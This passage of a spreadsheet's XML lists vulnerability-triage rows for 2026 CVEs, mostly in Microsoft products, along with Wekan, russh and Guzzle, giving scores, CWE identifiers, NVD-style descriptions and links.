      <c r="K3944" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3944" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t>
        </is>
      </c>
    </row>
    <row r="3945">
      <c r="A3945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68777</t>
        </is>
      </c>
      <c r="C3945" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3945" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3945" s="5" t="inlineStr"/>
      <c r="F3945" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3945" s="5" t="inlineStr"/>
      <c r="H3945" s="5" t="inlineStr"/>
      <c r="I3945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3945" s="5" t="inlineStr"/>
      <c r="K3945" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3945" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t>
        </is>
      </c>
    </row>
    <row r="3946">
      <c r="A3946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68778</t>
        </is>
      </c>
      <c r="C3946" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3946" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3946" s="5" t="inlineStr"/>
      <c r="F3946" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3946" s="5" t="inlineStr"/>
      <c r="H3946" s="5" t="inlineStr"/>
      <c r="I3946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3946" s="5" t="inlineStr"/>
      <c r="K3946" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3946" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t>
        </is>
      </c>
    </row>
    <row r="3947">
      <c r="A3947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68779</t>
        </is>
      </c>
      <c r="C3947" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3947" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3947" s="5" t="inlineStr"/>
      <c r="F3947" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3947" s="5" t="inlineStr"/>
      <c r="H3947" s="5" t="inlineStr"/>
      <c r="I3947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3947" s="5" t="inlineStr"/>
      <c r="K3947" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3947" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t>
        </is>
      </c>
    </row>
    <row r="3948">
      <c r="A3948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68780</t>
        </is>
      </c>
      <c r="C3948" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3948" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3948" s="5" t="inlineStr"/>
      <c r="F3948" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3948" s="5" t="inlineStr"/>
      <c r="H3948" s="5" t="inlineStr"/>
      <c r="I3948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3948" s="5" t="inlineStr"/>
      <c r="K3948" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3948" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t>
        </is>
      </c>
    </row>
    <row r="3949">
      <c r="A3949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68781</t>
        </is>
      </c>
      <c r="C3949" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3949" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3949" s="5" t="inlineStr"/>
      <c r="F3949" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3949" s="5" t="inlineStr"/>
      <c r="H3949" s="5" t="inlineStr"/>
      <c r="I3949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3949" s="5" t="inlineStr"/>
      <c r="K3949" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3949" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t>
        </is>
      </c>
    </row>
    <row r="3950">
      <c r="A3950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68784</t>
        </is>
      </c>
      <c r="C3950" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3950" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3950" s="5" t="inlineStr"/>
      <c r="F3950" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3950" s="5" t="inlineStr"/>
      <c r="H3950" s="5" t="inlineStr"/>
      <c r="I3950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3950" s="5" t="inlineStr"/>
      <c r="K3950" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3950" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t>
        </is>
      </c>
    </row>
    <row r="3951">
      <c r="A3951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68898</t>
        </is>
      </c>
      <c r="C3951" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3951" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3951" s="5" t="inlineStr"/>
      <c r="F3951" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3951" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3951" s="5" t="inlineStr"/>
      <c r="I3951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3951" s="5" t="inlineStr"/>
      <c r="K3951" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3951" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t>
        </is>
      </c>
    </row>
    <row r="3952">
      <c r="A3952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68901</t>
        </is>
      </c>
      <c r="C3952" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3952" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3952" s="5" t="inlineStr"/>
      <c r="F3952" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3952" s="5" t="inlineStr"/>
      <c r="H3952" s="5" t="inlineStr"/>
      <c r="I3952" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3952" s="5" t="inlineStr"/>
      <c r="K3952" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3952" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 10.38, the /api/boards/:boardId/export, /api/boards/:boardId/attachments/:attachmentId/export, /api/boards/:boardId/export/csv, and /api/boards/:boardId/exportExcel handlers in models/export.js and models/exportExcel.js looked up a user from the attacker-controlled authToken query parameter and immediately called user._id.toString() without checking whether ReactiveCache.getUser() returned undefined. A request for a private board with an unknown token therefore threw a TypeError from an asynchronous route, producing an unhandled rejection that could terminate the Wekan process and deny service to all users. Version 10.38 adds a 401 guard after every export token lookup and wraps export handlers with safeRoute() so unexpected exceptions become controlled responses. This issue is fixed in version 10.38.</t>
        </is>
      </c>
      <c r="M3952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68901</t>
        </is>
      </c>
    </row>
    <row r="3953">
      <c r="A3953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68930</t>
        </is>
      </c>
      <c r="C3953" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3953" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3953" s="5" t="inlineStr"/>
      <c r="F3953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3953" s="5" t="inlineStr"/>
      <c r="H3953" s="5" t="inlineStr"/>
      <c r="I3953" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3953" s="5" t="inlineStr"/>
      <c r="K3953" s="5" t="inlineStr">
        <is>
          <t>CWE-666, CWE-696, CWE-863</t>
        </is>
      </c>
      <c r="L3953" s="5" t="inlineStr">
        <is>
          <t>Russh is a Rust SSH client &amp; server library. Prior to 0.62.5, russh dispatches channel-scoped Handler callbacks for recipient channel IDs that were never opened or confirmed in russh/src/server/encrypted.rs, server_read_authenticated, and the exec_request callback. Version 0.62.5 fixes the issue.</t>
        </is>
      </c>
      <c r="M3953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68930</t>
        </is>
      </c>
    </row>
    <row r="3954">
      <c r="A3954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69245</t>
        </is>
      </c>
      <c r="C3954" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3954" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3954" s="5" t="inlineStr"/>
      <c r="F3954" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3954" s="5" t="inlineStr"/>
      <c r="H3954" s="5" t="inlineStr"/>
      <c r="I3954" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3954" s="5" t="inlineStr"/>
      <c r="K3954" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-346, CWE-384</t>
        </is>
      </c>
      <c r="L3954" s="5" t="inlineStr">
        <is>
          <t>Guzzle is an extensible PHP HTTP client. Prior to 7.15.2 and 8.0.1, SetCookie::matchesDomain() gives every subdomain of a cookie Domain that cookie unless SetCookie::matchesDomain() recognizes the Domain as an IP literal or a numeric host, and the decision comes from the domain's own text, so two spellings a transport reads as an address keep subdomain scope. Hexadecimal and mixed-base forms such as 0x7f000001 and 0177.0.0.0x1 go unrecognized while libcurl 8.21.0 reads both as 127.0.0.1. A percent-escaped Domain keeps that scope on both branches because percent-decoding sits above numeric parsing, so 192.168.0.%31 and 127.0.0.1%2e are registered names in the URI grammar rather than address literals, and no numeric rule in any base classifies them, while libcurl decodes the host before resolving and reads them as 192.168.0.1 and 127.0.0.1. A cookie stored for Domain=0x7f000001 is placed in the Cookie header of a request to evil.0x7f000001, disclosing a session identifier or token to a host that is not that address, and a response from evil.0x7f000001 setting Domain=0x7f000001 is accepted into the jar and replayed to the address, so a server answering for the look-alike name can fix a session or set application state. Exploitation requires the application to enable cookie support, address an origin by one of these spellings, and contact a host whose name ends in that spelling. This issue is fixed in versions 7.15.2 and 8.0.1.</t>
        </is>
      </c>
      <c r="M3954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69245</t>
        </is>
      </c>
    </row>
    <row r="3955">
      <c r="A3955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69267</t>
        </is>
      </c>
      <c r="C3955" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3955" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3955" s="5" t="inlineStr"/>
      <c r="F3955" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3955" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3955" s="5" t="inlineStr"/>
      <c r="I3955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3955" s="5" t="inlineStr"/>
      <c r="K3955" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L3955" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M3955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t>
        </is>
      </c>
    </row>
    <row r="3956">
      <c r="A3956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69297</t>
        </is>
      </c>
      <c r="C3956" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3956" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3956" s="5" t="inlineStr"/>
      <c r="F3956" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3956" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3956" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3956" s="5" t="inlineStr"/>
      <c r="K3956" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="L3956" s="5" t="inlineStr">
        <is>
          <t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t>
        </is>
      </c>
    </row>
    <row r="3957">
      <c r="A3957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69361</t>
        </is>
      </c>
      <c r="C3957" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3957" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3957" s="5" t="inlineStr"/>
      <c r="F3957" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3957" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3957" s="5" t="inlineStr"/>
      <c r="I3957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3957" s="5" t="inlineStr"/>
      <c r="K3957" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3957" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t>
        </is>
      </c>
    </row>
    <row r="3958">
      <c r="A3958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69374</t>
        </is>
      </c>
      <c r="C3958" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3958" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3958" s="5" t="inlineStr"/>
      <c r="F3958" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G3958" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3958" s="5" t="inlineStr"/>
      <c r="I3958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3958" s="5" t="inlineStr"/>
      <c r="K3958" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3958" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t>
        </is>
      </c>
    </row>
    <row r="3959">
      <c r="A3959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69375</t>
        </is>
      </c>
      <c r="C3959" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3959" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3959" s="5" t="inlineStr"/>
      <c r="F3959" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3959" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3959" s="5" t="inlineStr"/>
      <c r="I3959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3959" s="5" t="inlineStr"/>
      <c r="K3959" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3959" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="M3959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t>
        </is>
      </c>
    </row>
    <row r="3960">
      <c r="A3960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69395</t>
        </is>
      </c>
      <c r="C3960" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3960" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3960" s="5" t="inlineStr"/>
      <c r="F3960" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3960" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H3960" s="5" t="inlineStr"/>
      <c r="I3960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3960" s="5" t="inlineStr"/>
      <c r="K3960" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="L3960" s="5" t="inlineStr">
        <is>
          <t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t>
        </is>
      </c>
    </row>
    <row r="3961">
      <c r="A3961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69409</t>
        </is>
      </c>
      <c r="C3961" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3961" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3961" s="5" t="inlineStr"/>
      <c r="F3961" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G3961" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3961" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I3961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3961" s="5" t="inlineStr"/>
      <c r="K3961" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L3961" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t>
        </is>
      </c>
    </row>
    <row r="3962">
      <c r="A3962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69497</t>
        </is>
      </c>
      <c r="C3962" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3962" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3962" s="5" t="inlineStr"/>
      <c r="F3962" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G3962" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3962" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3962" s="5" t="inlineStr"/>
      <c r="K3962" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L3962" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t>
        </is>
      </c>
    </row>
    <row r="3963">
      <c r="A3963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69562</t>
        </is>
      </c>
      <c r="C3963" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3963" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3963" s="5" t="inlineStr"/>
      <c r="F3963" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3963" s="5" t="inlineStr"/>
      <c r="H3963" s="5" t="inlineStr"/>
      <c r="I3963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3963" s="5" t="inlineStr"/>
      <c r="K3963" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3963" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69562</t>
        </is>
      </c>
    </row>
    <row r="3964">
      <c r="A3964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69624</t>
        </is>
      </c>
      <c r="C3964" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3964" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3964" s="5" t="inlineStr"/>
      <c r="F3964" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3964" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H3964" s="5" t="inlineStr"/>
      <c r="I3964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3964" s="5" t="inlineStr"/>
      <c r="K3964" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L3964" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="M3964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t>
        </is>
      </c>
    </row>
    <row r="3965">
      <c r="A3965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69626</t>
        </is>
      </c>
      <c r="C3965" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3965" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3965" s="5" t="inlineStr"/>
      <c r="F3965" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3965" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3965" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3965" s="5" t="inlineStr"/>
      <c r="K3965" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3965" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t>
        </is>
      </c>
    </row>
    <row r="3966">
      <c r="A3966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69636</t>
        </is>
      </c>
      <c r="C3966" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3966" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3966" s="5" t="inlineStr"/>
      <c r="F3966" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G3966" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3966" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I3966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3966" s="5" t="inlineStr"/>
      <c r="K3966" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3966" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t>
        </is>
      </c>
    </row>
    <row r="3967">
      <c r="A3967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3967" s="5" t="inlineStr">
        <is>
